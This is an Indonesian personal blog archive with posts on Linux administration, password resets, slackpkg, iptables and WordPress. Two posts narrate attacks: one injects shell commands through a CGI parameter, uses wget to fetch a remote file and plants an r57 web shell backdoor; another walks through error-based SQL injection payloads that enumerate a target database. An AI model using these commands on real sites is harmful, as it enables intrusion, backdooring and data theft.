Bodhon: Sampai Saya Yang Terbodoh itu Tahu.. Silakan Copy Paste (by bimosaurus)

Desember 15, 2008, 10:34 am
Diarsipkan di bawah: Hacking and security

Suatu ketika seorang user membuka situs www.*********.com, dan ternyata didapati suatu hal yang ganjil. Yaitu sebuah bug bernama remote command execution. Apa itu Remote Command Execution? Yaitu bug yang memungkinkan seorang user memberikan perintah-perintah sistem operasi terhadap web tersebut. Berbahaya? Sangat berbahaya. Mengapa? Berikut liputannya..

Dalam proses browsing di google si pembaca merasa aneh dengan situs ini http://aurorum.se, dengan url lengkap http://***********/index.cgi?page=index.html. Pemanggilan dengan sistem inclusi file tersebut dapat menjadi kecurigaan tertentu bagi seorang yang belajar hacking. Saat itu user langsung melakukan perintah berikutnya

http://***********/index.cgi?page=|ls -al|

Apa hasilnya? Ternyata daftar listing file dalam direktori tersebut muncul seluruhnya. Lantas dia mencoba lagi.

http://***********/index.cgi?page=|which wget|

Apa hasilnya? Didapati hasilnya adalah sebagai berikut

/usr/bin/wget

Jelas sekali si User ini berusaha mencari dimana letak wget.. Selanjutnya si user ini melakukan lagi perintah berikut.

http://***********/index.cgi?page=|/usr/bin/wget http://geocities.com/must_bemore/move1.txt|

Nah, malah donlod file? Tapi apa dulu yang di donlod? Berhasilkah? Itulah yang dia lakukan .. mengecek apakah berhasil atau tidak..

http://************/index.cgi?PAGE=|ls%20-al|grep%20move|

Apa yang didapat?

-rw-r–r– 1 ********* ********** 85604 Jul 24 2007 move1.txt

Weh berhasil downloadnya.. Lantas?

http://***********/index.cgi?PAGE=|mv move1.txt curriculum.php|

Weks.. mencurigakan.. Lanjut?

http://************/curriculum.php

Apa hasilnya???

Script R57 Shell

Nah gimana tuh? Itulah yang disebut dengan script r57 yang berfungsi sebagai backdoor. Bisa dilihat di sini. Permainan pun berakhir..

Silakan copy paste

Tinggalkan sebuah Komentar

Tabel Permission Linux

Desember 15, 2008, 9:53 am
Diarsipkan di bawah: 1

Struktur direktori linux bekerja dengan sistem ijin atau permission. Ijin itu meliputi, item tersebut dapat dibaca, ditulis, dieksekusi atau tidak. Dan oleh siapa saja pelaku akses tersebut. Coba lihat list dibawah ini:

bimo@bimo:~/websaya$ ls -al
total 155
drwxr-xr-x 11 bimo users 424 2008-05-05 10:57 ./
drwxr-xr-x 4 bimo users 128 2008-07-15 09:09 ../
-rw-r–r– 1 bimo users 345 2008-05-05 10:57 .htaccess
drwxr-xr-x 19 bimo users 488 2008-05-05 10:57 _mod/
drwxr-xr-x 9 bimo users 432 2008-05-05 10:57 admin/
drwxr-xr-x 2 bimo users 272 2008-05-05 10:57 books/
drwxr-xr-x 2 bimo users 80 2008-05-05 10:57 config/
drwxr-xr-x 3 bimo users 1800 2008-05-05 10:57 images/
drwxr-xr-x 2 bimo users 472 2008-05-05 10:57 inc/
-rw-r–r– 1 bimo users 1128 2008-05-05 10:57 index.php
drwxr-xr-x 5 bimo users 240 2008-05-05 10:57 library/
drwxr-xr-x 18 bimo users 464 2008-05-05 10:57 mod/
drwxr-xr-x 3 bimo users 72 2008-05-05 10:57 photos/
-rw-r–r– 1 bimo users 20391 2008-05-05 10:57 style.css
-rw-r–r– 1 bimo users 16750 2008-05-05 10:57 style.old.css
-rw-r–r– 1 bimo users 99783 2008-05-05 10:57 webdepsos.sql

Dalam list tersebut dapat kita lihat, bahwa sebuah direktori atau sebuah item, atau sebuah file, akan memiliki atribut di depannya. Atribut tersebut akan digambarkan dengan tulisan

drwxrwxrwx

Mengapa dengan tulisan tersebut? Berikut penjelasannya.

Pada bagian depan , karakter nomer satu d, menunjukkan bahwa hitem tersebut adalah direktori. Selain hurup d, dapat juga item tersebut berupa hurup s atau l. Dapat juga berisi karakter - yang artinya adalah bukan direktori,alias berupa FILE.

Pada setelah hurup d, terdapat 3 blok hurup

rwx

Apakah maksudnya? Berikut penjelasannya:

rwx pertama adalah menunjukkan atribut untuk USER pemilik item tersebut

rwx kedua adalah menunjukkan atribut GROUP pemilik tersebut

Sedangkan rwx ketiga menunjukkan permission atribut untuk OTHER.

Hurup r, dinyatakan sebagai lambang atribut readable
Hurup w, dinyatakan sebagai lambang atribut writeable
Hurup x, dinyatakan sebagai lambang atribut executable

Salah satu aturannya adalah, jika hurup tersebut tidak terdapat pada tempatnya, alias digantikan tanda – (minus), maka permission tersebut tidak ada.

Contoh:

drwxr-xr-x bimo:users direktoriku

Maka sebenarnya hal itu menunjukkan bahwa direktori dengan nama direktoriku, yang dimiliki oleh user bimo dan group users memiliki atribut permission berupa

direktori

readable, writeable, executable untuk user bimo

readable executable untuk group users

dan

readable executable untuk others.

Dengan demikian, user bimo dapat melakukan apa saja terhadap direktori tersebut, dan anggota group users dapat membaca dan mengexecut direktori itu.

Dalam Linux, hal tersebut dapat digambarkan dalam sebuah tabel permission. Tabel permission dapat digambarkan sebagai berikut

	read/r	write/w	execute/x
user/u	4	2	1
group/g	4	2	1
other/o	4	2	1

Apakah maksud dari table ini? Table ini dimaksudkan bahwa untuk seluruh permission readable, akan diberikan nilai 4, untuk write diberikan nilai 2 dan untuk executable diberikan nilai 1. Sehingga untuk satu pemilik (entah user, group atau other) jika memiliki permission semuanya, akan diberikan nilai 777 (penjumlahan semua permission).

Jika drwxrwxr-x maka akan berharga 775

dan seterusnya.

PErtanyaan:

Apakah arti nilai permission table untuk rw-r–r–?

Mengganti Permission

Permission, dapat diganti oleh user, atau root. Catatan, untuk user bisa mengganti permission dengan syarat bahwa user memiliki akses penuh di direktori tersebut.

Proses penggantian permission dapat dilakukan dengan perintah :

chmod

Sintaks dari CHMOD adalah

chmod (user)+(atribut) nama direktori

misal

chmod u + x websaya

Artinya menambahkan hak execute untuk user pemiliknya pada direktori websaya.

u = user

g = group

o = other

a = all

Perintah tersebut dapat juga menggunakan Option REKURSIF yang artinya sampai ke seluruh penjuru dalam direktori

chmod -R a+x websaya

Artinya menambahkan hak execute pada seluruhnya, terhadap direktori websaya.

Untuk mengurangi hak, dapat mengganti operator + menjadi -

chmod -R a-x websaya

Artinya mengurangi hak execute secara rekursif terhadap direktori websaya

Perintah chmod dapat juga menggunakan table

chmod -R 777 websaya

artinya direktori websaya akan diberikan hak akses full (read write execute) secara rekursif

Begitupula dengan misal

chmod -R 644 websaya

yang artinya adalah menjadikan permission websaya hanya dapat diakses oleh user readable dan writable. sedangkan yang lain hanya readable

Lantas bagaimana dengan owner atau pemilikan?

Kita dapat menggunakan perintah

chown

sintaksnya adalah

chown user:group namadirektori

atau

chown -R user:group namadirektori

Contoh

chown bimo:users websaya

atau

chown -R bimo:users websaya

Sekian dulu..

CMIIW

Tinggalkan sebuah Komentar

Mereset Password Mysql

Desember 15, 2008, 8:40 am
Diarsipkan di bawah: 1

MERESET PASSWORD MYSQL (Seperti yang saya tuliskan di GECC-ugm.com)

Anda punya masalah dengan LUPA password Root MySQL? Berikut caranya:

Pada intinya, seluruh login dan properti mysql telah terdapat pada MYSQL itu sendiri.
Untuk user password root mysql juga telah terdapat pada suatu database yaitu database mysql. Hanya saja, database MYSQL hanya dapat dibuka oleh root saja. Sedangkan jika kita kehilangan password root, maka kita tidak dapat masuk ke database MySQL.
Untuk mengganti MySQL root password, maka kita akan masuk ke Database MySQL, dan mengubah password root dari sana.

Lantas? Bagaimana cara masuk ke MySQL?

Kuncinya adalah: Masuk ke MySQL pada mode –skip-grant-tables

- matikan mysql terlebih dahulu

Code:

killall mysqld

atau kalau windows, matikan dari konsole panel mysql (xampp, wamp, appserv dll)

- masuklah ke direktori bin mysql yaitu direktori yang memuat command mysql

contoh:

Code:

cd /usr/sbin/

atau di windows dapat amsuk lebih dulu ke CMD:

contoh:

Code:

cd \
cd xampp\mysql\bin\

jalankanlah perintah ini:

Untuk Linux:

Code:

mysqld_safe –skip-grant-tables &

atau jika tidak ketemu

Code:

safe_mysqld –skip-grant-tables &

Untuk windows:

Code:

mysqld_safe –skip-grant-tables

Proses menjalankan mysql dengan safe mode telah berjalan

Selanjutnya masuklah ke mysql:

Code:

mysql -u root

Enter:

SIM SALABIM.. masuk

dan masuk ke database mysql:

Code:

use mysql

Tampilan menjadi seperti berikut

Code:

mysql> use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

dan selanjutnya lakukanlah pengubahan password…

Code:

select user, password, host from user;

Tampilan menjadi seperti berikut:

Code:

Pada kolom password, anda dapat melihat bahwa password tetap tidak dapat dibaca. Hal tersebut karena enkripsi password satu arah dari MySQL. Kita hanya perlu mengetahui tipe ENKRIPSI. Untuk MySQL biasanya adalah tipe enkripsi password ataupun old_password

kemudian testlah tipe tipe enkripsi dengan seperti ini:

Code:

select password('admin');

hasilnya adalah:

Code:

mysql> select password('admin');
+——————————————-+
| password('admin') |
+——————————————-+
| *4ACFE3202A5FF5CF467898FC58AAB1D615029441 |
+——————————————-+
1 row in set (0.04 sec)

Dan

Code:

select old_password('password');

hasilnya adalah

Code:

mysql> select old_password('admin');
+———————–+
| old_password('admin') |
+———————–+
| 43e9a4ab75570f5b |
+———————–+
1 row in set (0.00 sec)

Dengan demikian kita dapat mengetahui bahwa tipe enkkripsinya adalah password.

Nah selanjutnya….

Code:

update user set password=password('root') where user='root' and host='localhost';

hasilnya adalah:

Code:

mysql> update user set password=password('root') where user='root' and host='localhost';
Query OK, 0 rows affected (0.19 sec)
Rows matched: 1 Changed: 0 Warnings: 0

Jangan lupa menambahkan:

Code:

flush privileges;

Hasilnya adalah:

Code:

mysql> flush privileges;
Query OK, 0 rows affected (0.05 sec)

Untuk password sesuaikan dengan kebutuhan dan syaratnya.. ingat bahwa mysql adalah multiple password. 1 User dapat memiliki lebih dari 1 password.

matikan mysql anda, dan hidupkan seperti biasa, tanpa mode –skip-grant-tables..

SIM SALABIM, masuk!!

Mode –skip-grant-tables hanya boleh dipakai untuk keadaan seperti itu.. dan juga repair database. Untuk keadaan lainnya, not recomended.. Karena –skip-grant-tables memungkinkan seluruh sisi dapat membuka mysql dengan login root tanpa password.

Tinggalkan sebuah Komentar

Mereset Password LINUX

Desember 15, 2008, 8:31 am
Diarsipkan di bawah: 1

MERESET PASSWORD LINUX.. seperti yang saya tuliskan di http://GECC-UGM.com/forum

Mungkin suatu ketika kita akan mengalami masalah dengan masuk ke account linux kita, yaitu kita kehilangan password untuk superuser alias root. Nah bagaimana menanganinya? Penanganannya hanya satu persyaratannya: “Kita benar-benar menghadapi mesin Linux tersebut” Hanya itu. Lantas bagaimana cara untuk mengganti?Ada dua yang saya kenal dalam mengganti password Linux. Teknik pertama akan berjalan pada Linux Redhat. Sedangkan teknik kedua akan berjalan pada seluruh sistem Linux.

Teknik Pertama:

Reboot lah sistem Linux anda, dan masuk ke dalam LINUX SINGLE MODE. Bagaimana masuk Linux Single Mode ini?
Ketika Linux anda melakukan booting dan masuk ke mode GRUB.

Pada mode GRUB akan terdapat beberapa pilihan kernel. Biasanya disitu juga kita memilih Sistem Operasi lain jika dilakukan dual Boot. Saat itu pilihlah salah satu kernel, jangan tekan enter, dan langsung ketik ‘E’ untuk meng-edit boot kernel tersebut.
Setelah tekan E akan muncul pilihan :
root
kernel
initrd

Pilihlah KERNEL, dan akan muncul seperti ini

Code:

kernel /boot/vmlinuz-2.6.18-1.2798.fc6 ro root=LABEL=/

KEtikkan seperti ini

Code:

kernel /boot/vmlinuz-2.6.18-1.2798.fc6 ro root=LABEL=/ SINGLE

Maka Linux akan booting, dan akan masuk langusng dengan mode ROOT

Code:

grub#

ketikkan :

Code:

passwd

Dan masukkan password dan boot linux anda seperti biasa

TEKNIK KEDUA

Teknik kedua ini telah banyak dikenal dengan menggunakan BOOT CD, dan system akan berjalan pada CD. Saat itu, buatlah sebuah direktori bayangan pada Linux anda.

Code:

#mkdir /mnt/linuxboot

dan mount lah linux yang ada dalam hardisk anda ke dalam direktori baru itu.

Code:

#mount /dev/hda3 /mnt/linuxboot

Code:

/dev/hda3 dapat anda dapatkan dengan mencari di

#dmesg</div>
dan pilihlah dan cobalah yang kira kira memuat direktori root linux hardisk anda.

Ceklah dengan
<div class="codeheader">Code:</div>
<div class="code">#ls /mnt/linuxboot</div>
Harusnya hasilnya adalah:
<div class="codeheader">Code:</div>
<div class="code">/root /boot /etc /usr dll</div>
Nah jika saat itu benar, maka gunakanlah perintah UNTUK MEMINDAH SYSTEM LINUX YANG SEMULA BERJALAN DI CD MENJADI KE HARDISK dengan perintah:
<div class="codeheader">Code:</div>
<div class="code">#chroot /mnt/linuxboot</div>
Setelah itu, system akan berpindah ke Linux Hardisk anda. Selanjutnya lakukan hal ini:
<div class="codeheader">Code:</div>
<div class="code">#passwd</div>
Masukkan password yang anda suka, dan rebootlah seperti biasa, jangan lupa remove dulu CD anda

Tinggalkan sebuah Komentar

Kata tersering dicari pada mesin cari Google

April 21, 2008, 1:17 pm
Diarsipkan di bawah: Umum

Anda perlu mesin bantu untuk check rating kata-kata yang paling sering dicari di google? Ini tipsnya. Gunakanlah Google Suggest. Apa itu Google Suggest? Yaitu sebuah plugins untuk browser yang berfungsi untuk membantu menggunakan kata pencarian dalam Google, berikut jumlah yang ditemukannya.

Contoh Google Suggest

Dalam gambar tersebut, terlihat bahwa seseorang sedang mencari nama Roy Suryo dalam Google, dan langsung mendapat respon dari Google dengan kata yang berdekatan. Dari Google suggest tersebut didapat kata yang paling sering digunakan adalah Roy Suspension, diikuti dengan Roy Surya. Dan kita dapat terkejut jika melihat ternyata kata Roy Suryo Bego ternyata mendapat temuan yang cukup banyak dari google.

Bagaimana mendapatkan Google Suggest ini?

Caranya adalah, untuk opera dan Internet Explorer dapat mencari sendiri di google, sedangkan untuk pengguna Mozilla dapat menggunakan Plugins dengan nama : CustomizeGoogle dengan cara mencari di http://addons.mozilla.org. Silakan dilakukan installasi, restart firefox dan nikmatilah pencarian dibantu dengan google suggest. Insformasi yang didapat nanti memang berasal dari google dan bukan tersimpan di komputer kita. Lakukanlah juga update untuk setiap kali ada update untuk Customize Google, untuk mendukung update data dan sekuritas.

Google Suggest ini pernah menjadi masalah juga yang dapat dilihat di detikinet. Google suggest dituding mengarahkan user ke pembajakan dengan alasan adalah, banyak user yang ketika mencari suatu software dengan mesin cari google dilengkapi google suggest, ternyata malah di rating tertinggi didapat crack nya, sehingga menghilangkan niat user untuk membeli, dan justru melakukan cracking software tersebut

Nah kalau sudah begitu, siapa yang bisa disalahkan ?

Silakan Copy Paste

Tinggalkan sebuah Komentar

Update Online SLACKWARE dengan Slackpkg

Mei 31, 2007, 2:20 am
Diarsipkan di bawah: Linux

Sebagian besar pengguna Linux Fedora dan Debian telah terbiasa menggunakan online updater yang memungkinkan installasi dan update melalui jaringan. Untuk Linux Fedora/RedHat, bisa menggunakan YUM (YellowDog Update Manager), sedangkan pengguna Linux berbasis Debian menggunakan apt-get untuk melakukan update online. Apt-Get ini kemudian digunakan secara adopsi oleh sebagian pengguna linux slackware untuk membuat suatu sistem update juga yang bernama slapt-get. Untuk masalah online update ini, pengguna slackware banyak mengalami kesulitan, karena kebanyakan harus melakukan download dari mirror tertentu, kemudian melakukan installasi dengan menggunakan installpkg atau install standard.

Untuk mengatasi kesulitan para pengguna slackware, maka para relawan slackware membuat sebuah proyek yang dinamakan slackpkg. Anda dapat melihat tentang slackpkg tersebut pada situs proyeknya di :

http://slackpkg.org

Beberapa situs juga telah menyediakan source slackpkg tersebut seperti:

http://slackpkg.sourceforge.net

dan beberapa situs lainnya.

Nama file source dari slackpkg tersebut adalah slackpkg-2.60-noarch-1.tgz (angka seri digunakan untuk menentukan kernel yang direkomendasikan). Anda dapat melakukan download slackpkg tersebut, kemudian melakukan installasi dengan menggunakan perintah :

installpkg slackpkg-2.60-noarch-1.tgz

Installasi akan berlangsung secara standard, yang hasilnya adalah berupa file execution

slackpkg

dengan acuan konfigurasi adalah file slackpkg.conf dan mirror yang ada di /etc/slackpkg .

Isi dari file /etc/slackpkg/slackpkg.conf antara lain seperti berikut:

————————————————–

#
# slackpkg.conf – Configuration for SlackPkg
# v2.0
#

#
# SlackPkg – An Automated packaging tool for Slackware Linux
# Copyright (C) 2003,2004,2005,2006,2007 Roberto F. Batista, Evaldo Gardenali
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Project Page: http://slackpkg.org/
# Roberto F. Batista (aka PiterPunk) piterpk@terra.com.br
# Evaldo Gardenali (aka UdontKnow) evaldogardenali@fasternet.com.br
#

# For configuration options that have only two states, possible values are
# either “on” or “off”

# Remember, the only official Slackware ports are x86 and s390, and
# slackpkg developers don’t have s390 boxes for testing. If you are
# testing/using in other archs and have suggestions or patches,
# please let me know (piterpk@terra.com.br)
#
# Select the architecture of your system
# x86 (the main arch for Slackware)
ARCH=i[3456]86
# x86_64 (Slamd64 and BlueWhite64)
#ARCH=x86_64
# PowerPC (Slackintosh)
#ARCH=powerpc
# S/390 (Slack/390)
#ARCH=s390

# Downloaded files will be in directory below:
TEMP=/var/cache/packages

# Package lists, file lists and others will be at WORKDIR:
WORKDIR=/var/lib/slackpkg

# Special options for wget (default is WGETFLAGS=”–passive-ftp”)
WGETFLAGS=”–passive-ftp”

# If DELALL is “on”, all downloaded files will be removed after install.
DELALL=on

# If CHECKPKG is “on”, the system will check the md5sums of all packages before
# install/upgrade/reinstall is performed.
CHECKPKG=on

# If CHECKGPG is “on”, the system will verify the GPG signature of each package
# before install/upgrade/reinstall is performed.
CHECKGPG=on

# The lines below will set the download priority.
# Default values: /patches /slackware /extra /pasture /testing
FIRST=patches
SECOND=slackware
THIRD=extra
FOURTH=pasture
FIFTH=testing

# The default MAIN is “slackware”, but some derived distros uses other
# names as the main directory. Of course, MAIN needs to be listed in
# the download priority directories
MAIN=slackware

# Enables (on) or disables (off) slackpkg’s post-installation features, such
# as checking for new (*.new) configuration files and new kernel images, and
# prompts you for what it should do. Default=on
POSTINST=on

# The ONOFF variable sets the initial behavior of the dialog interface.
# If you set this to “on” then all packages will be selected by default.
# If you prefer the opposite option (all unchecked), then set this to “off”.
ONOFF=on
# If this variable is set to “on”, all files will be downloaded before the
# requested operation (install or upgrade) is performed. If set to “off”,
# then the files will be downloaded and the operation (install/upgrade)
# performed one by one. Default=off
DOWNLOAD_ALL=off

# Enables (on) or disables (off) the dialog interface in slackpkg. Default=on
DIALOG=on

#
# The MIRROR is set from /etc/slackpkg/mirrors
# You only need to uncomment the selected mirror.
# Uncomment one mirror only.
#

————————————————–

Sedangkan isi dari File Mirror adalah berupa daftar mirror dari resource linux slackware, antara lain

————————————————————-

# mirrors – List of Slackware Linux mirrors.
#
# SlackPkg – An Automated packaging tool for Slackware Linux
# Copyright (C) 2003,2004,2005,2006,2007 Roberto F. Batista, Evaldo Gardenali
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Project Page: http://slackpkg.org/
# Roberto F. Batista (aka PiterPunk) piterpk@terra.com.br
# Evaldo Gardenali (aka UdontKnow) evaldogardenali@fasternet.com.br
#
# END OF LEGAL NOTICE
#
#
# You only need to select one mirror and uncomment them. Please,
# ONLY ONE mirror can be uncommented each time.
#
# In this file you can find mirrors for slackware 11.0, current
# and 10.2 (in this order).
#
# The mirrors file is kept synced with the official slackware
# mirrors. If you find any incorrect mirror, please report it
# to fizban <fizban@slackware.com>
#

#—————————————————————-
# Local CD drive
#—————————————————————-
#cdrom://mnt/cdrom/

#—————————————————————-
# Slackware 11.0
“/etc/slackpkg/mirrors” 711 lines, 29901 characters
#—————————————————————-
# Slackware 11.0
#—————————————————————-
#Australia, 155Mbit
#http://ftp.planetmirror.com/pub/slackware/slackware-11.0/
#ftp://ftp.planetmirror.com/pub/slackware/slackware-11.0/
#Australia, 250Mbit
#http://mirror.pacific.net.au/linux/slackware/slackware-11.0/
#ftp://mirror.pacific.net.au/linux/slackware/slackware-11.0/
#Australia, 45mbit, 100Mbit
#ftp://mirror.veridas.net/pub/slackware/slackware-11.0/
#Austria, 100Mbit
#ftp://ftp.slackware.at/slackware-11.0/
#Austria,
#http://gd.tuwien.ac.at/opsys/linux/slackware/slackware-11.0/
#ftp://gd.tuwien.ac.at/opsys/linux/slackware/slackware-11.0/
#Austria, 4Mbit
#http://slackware.itsoft.at/slackware/slackware-11.0/
#ftp://slackware.itsoft.at/slackware/slackware-11.0/
#Belgium, 2×1Gbit
#http://ftp.belnet.be/packages/slackware/slackware-11.0/
#ftp://ftp.belnet.be/packages/slackware/slackware-11.0/
#Belgium, 1Gbit
#http://ftp.scarlet.be/pub/slackware/slackware-11.0/
#ftp://ftp.scarlet.be/pub/slackware/slackware-11.0/
#Belgium, 100Mbit
#ftp://gaosu.rave.org/pub/linux/slackware/slackware-11.0/
#Brasil, 150Mbit
#ftp://ftp.slackware-brasil.com.br/slackware-11.0/
#Brasil, 50Mbit
#http://mirror.slacklife.com.br/slackware-11.0/
#Bulgaria, 20Mbit, 100Mbit
#http://mirrors.evrocom.net/slackware/slackware-11.0/
#ftp://mirrors.evrocom.net/slackware/slackware-11.0/
#Bulgaria, 5Mbit
.

————————————————————-

Untuk pertamakali anda menggunakan slackpkg, anda harus melakukan update terlebih dahulu dengan cara melakukan uncomment salah satu mirror agar dapat diproses oleh slackpkg, atau menambahkan salah satu mirror yang mungkin anda dapat tentukan karena linknya lebih dekat.Kemudian dapat diberikan perintah:

slackpkg update

Selanjutnya setelah proses update selesai, anda dapat mulai melakukan install onlin, update online dengan slackpkg. Anda dapat melihat keseluruhan opsi dari slakcpkg tersebut dengan

man slackpkg

Semoga berguna, dan selamat berupdate dengan slackpkg… Jangan lupa, silakan kopi paste dan

We will slack everything !!!

Tulisan ini juga dapat dilihat di forum kaskus… “make the kaskus will be the positive site”

Tinggalkan sebuah Komentar

Mengapa petunjuk Error justru berbahaya?

April 23, 2007, 8:12 am
Diarsipkan di bawah: Hacking and security

Dalam berbagai macam teknik hacking, ternyata sebagian besar justru memanfaatkan pesan kesalahan dari server sasaran. Maka bisa dipastikan bahwa Error justru merupakan petunjuk informasi yang penting bagi sebuah server untuk segera dilakukannya teknik hacking oleh para hacker. Jika para netter biasa, akan sangat kesal dengan adanya error, maka para hacker akan menyambut dengan sukacita errornya sistem tersebut.
Mungkin kita biasa sekali menemui halaman, the page cannot displayed, atau error database, atau seperti screenshoot di bawah ini:

The image “http://geocities.com/bimosaurus/errorasp.GIF” cannot be displayed, because it contains errors.

Gambar 1. Error ASP

Mungkin bagi sebagian orang tidak begitu mengerti apa arti error ini dan apa guna error tersebut.. Berikut cuplikan di bawah sangat penting menghindari error. Secara bodhon, error adalah petunjuk kesalahan.. Ya dengan petunjuk kesalahan yang terbaca publik, jelas memungkinkan orang lain mengambil keuntungan dengan error ini.
Seorang hacker newbie yang sedang mencoba-coba situs milik pemerintah dengan menggunakan situs google.com. Dia hanya menggunakan kata kunci sebagai berikut : .go.id .asp

The image “http://geocities.com/bimosaurus/googlegoid.GIF” cannot be displayed, because it contains errors.

Gambar 2. Browsing situs-situs ber ASP

Kemudian dari hasil pencarian dia, didapat beberapa hasil. Kemudian salah satu situs dia test lagi dengan menggunakan sintaks seperti ini

http://situskorban/index.asp?id=208089

dia ganti menjadi

http://situskorban/index.asp?id=’208089

Maka tampak error sebagai berikut

The image “http://geocities.com/bimosaurus/errorasp.GIF” cannot be displayed, because it contains errors.

Gambar 3. Error ASP

Selanjutnya dia melakukan test lanjut dengan melakukan convert type data string ke dalam integer, dimana data tersebut tidak bisa di konvert. Yaitu kata kata “test”.

http://situskorban/index.asp?id=’208089′%20and%201=convert(int,(‘test’));–

Tampak pada error adalah gambar berikut

The image “http://geocities.com/bimosaurus/erroraspp.GIF” cannot be displayed, because it contains errors.

Gambar 4. Error ASP

Dengan modal error itu dia melanjutkan kembali injectnya. Kali ini dia meng-convert string nama-nama tabel dan kolom yang ada pada database ke dalam integer (yang pasti error), dan kemudian melakukan akses ke dalam rekord database.

http://situskorban/index.asp?id=’208089′%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables));–

Haslinya adalah error berikut

The image “http://geocities.com/bimosaurus/errorasppp.GIF” cannot be displayed, because it contains errors.

Gambar 5. Error ASP

ya saat ini dia bisa mengerti ada satu tabel bernama tabel : index

Kemudian dia lanjut lagi sampai beberapa nama tabel lagi, singkatnya seperti ini, dengan nama nama tabel : index, entry, sysconstraints. Dia terus mencari informasi sedalam-dalamnya dari database tersebut dengan bermodal ERROR.

http://situskorban/index.asp?id=’208089′%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in(‘index’,'entry’,’sysconstraints’)));–

.
.
.
.

Selanjutnya dia mencoba melakukan akses ke kolom, dalam tabel index.

http://situskorban/index.asp?id=’208089′%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=(‘index’)));–

http://situskorban/index.asp?id=’208089′%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=(‘index’)%20and%20column_name%20not%20in(‘id’)));–

hasilnya adalah

The image “http://geocities.com/bimosaurus/erroraspppp.GIF” cannot be displayed, because it contains errors.

Gambar 6. Error Asp

Cukup sampai disitu? Ya tentang cerita ini bisa berhenti disitu. Tetapi yang jelas kita tahu, dia bisa saja melakukan perintah update database. Atau bahkan mencari kolom user yang kemudian dia mengganti kekuasaan / kemapuan upload script-script kiddies, yang berfungsi untuk melakukan eksploitasi lanjut ke dalam server. Bisa juga dia akhirnya membuka service untuk servis remote desktop connection. Ya modal utama dia adalah ERROR.

The image “http://geocities.com/bimosaurus/errorasppppp.GIF” cannot be displayed, because it contains errors. Gambar 7. Error ASP

Satu lagi, ternyata, WIndows, ASP dan sql server adalah team bagus dan empuk sebagai sasaran deface..

Tinggalkan sebuah Komentar

Traffic Shaping dengan IPTABLES (postingan lama di MP)

April 20, 2007, 12:55 am
Diarsipkan di bawah: Linux, Networking

Para pelaku bisnis jaringan, atau pengelola jaringan instansi dan institusi banyak sekali mencari program-program yang digunakan untuk melakukan traffic shapping atau bandwidth manager. Pada linux yang paling familiar adalah dengan menggunakan htb atau cbq. Sedangkan di BSD biasanya menggunakan ip dummynet dengan perintah-perintah ipfw

Nah bagi yang nggak mau berpusing-pusing dengan htb atau cbq maka ada suatu solusi yang lumayan ringkas dan cukup akurat.. Asal tahu aja kalau htb dan cbq yang selama ini saya pake ternyata memiliki kekurangan. Mereka tidak tahan dengan beban tinggi. Nah, ternyata linux juga memiliki solusi dengan menggunakan tools jaringan bawaannya yang bernama iptables. Iptables ini sudah biasa digunakan mengelola jaringan, mengarahkan route, memblokir, meneruskan, memberrikan aturan antrian dll. Lho terus gimana dong memberikan aturan traffic shapping dalam Linux?

Begini:

Komponen rule utama dalam iptables yang perlu dipakai adalah:

iptables blablablabla –source/–destination -m limit –limit xx/s –limit-burst xx -J ACCEPT

tapi dengan catatan bahwa secara policy, targetnya adalah DROP

Contoh:

Misalnya saya punya jaringan dengan kondisi seperti ini

Saluran masuk dari internet melalui
eth0, kemudian traffic internet tersebut dibagi ke
eth1, dengan net address 192.168.10.0/24
eth2, dengan net address 192.168.100.0/24
Kemudian pada net address yang pertama tersebut ada beberapa sub blok yaitu
- marketing
- hosting
- administrator
- technical support
- management

maka
contohnya:

iptables -P FORWARD -j DROP
iptables -A FORWARD -d 192.168.10.0/24 -m limit –limit 100/s –limit-burst 20 -j ACCEPT
iptables -A FORWARD -s 192.168.10.0/24 -m limit –limit 100/s –limit-burst 20 -j ACCEPT
;semua traffic masuk dan keluar dari 192.168.10.0/24 dibatasi maksimal sejumlah 100kbps

1 Komentar

Trik Installasi Web dinamis CMS

April 19, 2007, 3:03 am
Diarsipkan di bawah: WebResources

Banyak mungkin diantara teman teman yang memiliki kesulitan melakukan installasi web ke dalam webserver, baik menggunakan server sendiri ataupun secara hosting dengan menggunakan cPannel. Apalagi jaman sekarang, banyak web web cms yang bertebaran secara bebas. Contoh saja misal : WordPress, Mambo, Joomla, Forum, dan lain sebagainya. Tak jarang web resource ini dipakai juga sebagai web sebuah instansi besar. Nah, triknya apa sih?

Sebenarnya secara BODHON yang paling penting dalam memahami installasi web adalah :

1. Aplikasi
2. Database
3. Bentuk akses kita ke webserver (Konsol, browser, shell, atau cPannel)
4. Bagaimana aplikasi web bisa melakukan akses ke database

Itu saja.

Disini saya ambil contoh adalah installasi WordPress. Resource nya dapat diambil di sini http://wordpress.org/download/. Ada dalam bentuk zip atau tar.gz. Sama saja.

Kita sebaiknya melakukan extracting di server, atau web servernya untuk menghindari corrupt file ketika upload folder.

Langkahnya lengkapnya adalah sebagai berikut :

Donlod dulu WP (wordpress) anda..
Siapkan server anda. (yang Linux, login dulu, WIndows juga siapkan webservernya, CPannel juga siapkan cPanelnya)
Buatlah database dengan nama yang anda inginkan misal: WPku, dengan User:Userku, Password: Passwordku, Host:localhost. Untuk yang pake konsol
mysql>mysql -u root -p
mysql>create database WPku
mysql>grant all privileges on WPku.* to Userku@localhost identified by ‘Passwordku’;
